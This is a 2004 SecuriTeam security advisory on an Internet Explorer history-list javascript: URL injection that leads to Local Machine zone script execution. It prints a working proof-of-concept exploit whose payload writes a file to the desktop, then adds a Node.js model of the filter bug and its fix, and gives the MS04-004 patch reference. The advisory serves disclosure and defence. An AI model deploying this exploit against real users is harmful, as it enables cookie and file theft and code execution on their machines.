[NT] Internet Explorer JavaScript URL Injection in History List
From: SecuriTeam (support_at_securiteam.com)
Date: 02/05/04
To: list@securiteam.com Date: 5 Feb 2004 19:01:07 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Internet Explorer JavaScript URL Injection in History List
------------------------------------------------------------------------
SUMMARY
There is a way to inject a malicious javascript: URL into the history list
of Internet Explorer so that cross-site / cross-zone scripting occurs when
the user clicks the Back button. An attacker may use this to read arbitrary
cookies and local files and to execute programs, leading to total system
compromise if IE is run as administrator.
DETAILS
Vulnerable Systems:
* Internet Explorer 6 Service Pack 1
* Internet Explorer 5.5 Service Pack 2
* Internet Explorer 5 Service Pack 4
The technique is straightforward and relies on the fact that a javascript:
URL executes in the security context (domain and zone) of the document it
is applied to. A similar method was described in CAN-2003-1026
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-1026>, which
also injects URLs into the history list and relies on the user pressing the
Back button.
Internet Explorer tries to remove javascript: URLs from the history list but
fails in some situations. One such case is when a javascript: URL links to
an external resource with external.NavigateAndFind('res:','',''), where
'res:' resolves to the Local Machine zone. When the user navigates back, the
javascript: URL is applied over the Local Machine zone document, so its code
runs with Local Machine zone privileges.
A sample exploit:
// Andreas Sandblad, 2004-02-03, patched by MS04-004

// Name: payload
// Purpose: Run payload code called from Local Machine zone.
// The code may be arbitrary such as executing shell commands.
// This demo simply creates a harmless textfile on the desktop.
function payload() {
    file = "sandblad.txt";
    o = new ActiveXObject("ADODB.Stream");
    o.Open();
    o.Type = 2;                 // adTypeText
    o.Charset = "ascii";
    o.WriteText("You are vulnerable!");
    o.SaveToFile(file, 2);      // adSaveCreateOverWrite
    o.Close();
    alert("File " + file + " created on desktop!");
}

// Name: trigger
// Purpose: Inject javascript url in history list and run payload
// function when the user hits the backbutton. On the first run the
// history length matches, so the javascript: URL becomes a document whose
// onload jumps to 'res:'. When the user hits Back, the length differs and
// payload() runs over the Local Machine zone document.
function trigger(len) {
    if (history.length != len)
        payload();
    else
        return "<title>-</title><body onload=external.NavigateAndFind('res:','','')>";
}

// Name: backbutton
// Purpose: Run backbutton exploit. The function sources are concatenated
// into the javascript: URL so they are available after navigation.
function backbutton() {
    location = 'javascript:' + trigger + payload + 'trigger(' + history.length + ')';
}

// Launch backbutton exploit on load
if (confirm("Press OK to run backbutton exploit!"))
    backbutton();
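The failure the advisory describes is a filter that runs on one navigation path (ordinary location changes) but not on another (the document reached through external.NavigateAndFind). The following model, added here and not part of the advisory or of Internet Explorer's code, replays the sample exploit's sequence against a toy history list in two variants: one that filters only on the ordinary path, and one that funnels every path through a single check. The zone names, the mapping of 'res:' to the Local Machine zone (taken from the text above), the scheme canonicalisation and the placeholder URL http://attacker.example/ are assumptions for illustration. It runs under Node.js.

```javascript
// Added example, not part of the advisory: a model of a browser history
// list with a script-URL filter. It reproduces the failure mode described
// above (the filter is applied on ordinary navigation but skipped on a second
// navigation path) beside the fix (every path funnels through one check).
// The zone names, the toy URL->zone mapping and the class design are
// assumptions for illustration, not Internet Explorer's internals.

// Canonicalise the scheme before comparing it, as URL parsers do: drop
// leading C0 controls and spaces, strip tab/CR/LF anywhere, lower-case.
function urlScheme(url) {
  const cleaned = String(url)
    .replace(/^[\u0000-\u0020]+/, "")
    .replace(/[\t\r\n]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

const SCRIPT_SCHEMES = new Set(["javascript", "vbscript"]);

function isScriptUrl(url) {
  return SCRIPT_SCHEMES.has(urlScheme(url));
}

// Assumed zone mapping: 'res:' resolves to the Local Machine zone, as the
// advisory states; everything else is treated as Internet zone here.
function zoneOf(url) {
  return urlScheme(url) === "res" ? "LocalMachine" : "Internet";
}

class HistoryModel {
  // filterEveryPath=false models the leak; true models the fix.
  constructor(filterEveryPath) {
    this.filterEveryPath = filterEveryPath;
    this.entries = [];    // back list, oldest first
    this.current = null;  // URL of the document currently displayed
  }

  // The single place where a URL enters the back list.
  record(url, filtered) {
    if (url === null) return;
    if (filtered && isScriptUrl(url)) return;  // script URLs never stored
    this.entries.push(url);
  }

  // Ordinary navigation (location = ...): the filter is always applied.
  navigate(url) {
    this.record(this.current, true);
    this.current = url;
  }

  // Second entry point, modelled on external.NavigateAndFind(): the leaky
  // variant records the outgoing document without running the filter.
  navigateAndFind(url) {
    this.record(this.current, this.filterEveryPath);
    this.current = url;
  }

  // Back button: a script URL is applied over the document currently shown,
  // so it executes in that document's zone; any other URL loads in its own.
  back() {
    if (this.entries.length === 0) return null;
    const url = this.entries.pop();
    const zone = isScriptUrl(url) ? zoneOf(this.current) : zoneOf(url);
    this.current = url;
    return { url, zone };
  }
}

// Replays the advisory's sequence: attacker page -> javascript: URL ->
// NavigateAndFind('res:') -> Back. Returns what the Back button runs.
// 'http://attacker.example/' is a constructed placeholder.
function runScenario(filterEveryPath) {
  const h = new HistoryModel(filterEveryPath);
  h.navigate("http://attacker.example/");
  h.navigate("javascript:payload()");
  h.navigateAndFind("res:");
  return h.back();
}

console.log("leaky:", JSON.stringify(runScenario(false)));
console.log("fixed:", JSON.stringify(runScenario(true)));
```

In the leaky variant Back returns the javascript: entry with zone LocalMachine, which is the condition the sample exploit's trigger() relies on; in the fixed variant Back returns the attacker's page in the Internet zone. The two points worth taking from the model are that the filter must sit at the one place where entries are recorded, whatever path reaches it, and that the scheme must be compared after canonicalisation, since " JavaScript:" and "java\tscript:" are also script URLs.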
Patch Availability:
Microsoft has issued a patch (MS04-004) and it is advisable to install the
update. For more information, visit
http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS04-004.asp
ADDITIONAL INFORMATION
The information has been provided by Andreas Sandblad <mailto:sandblad@acc.umu.se>.
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.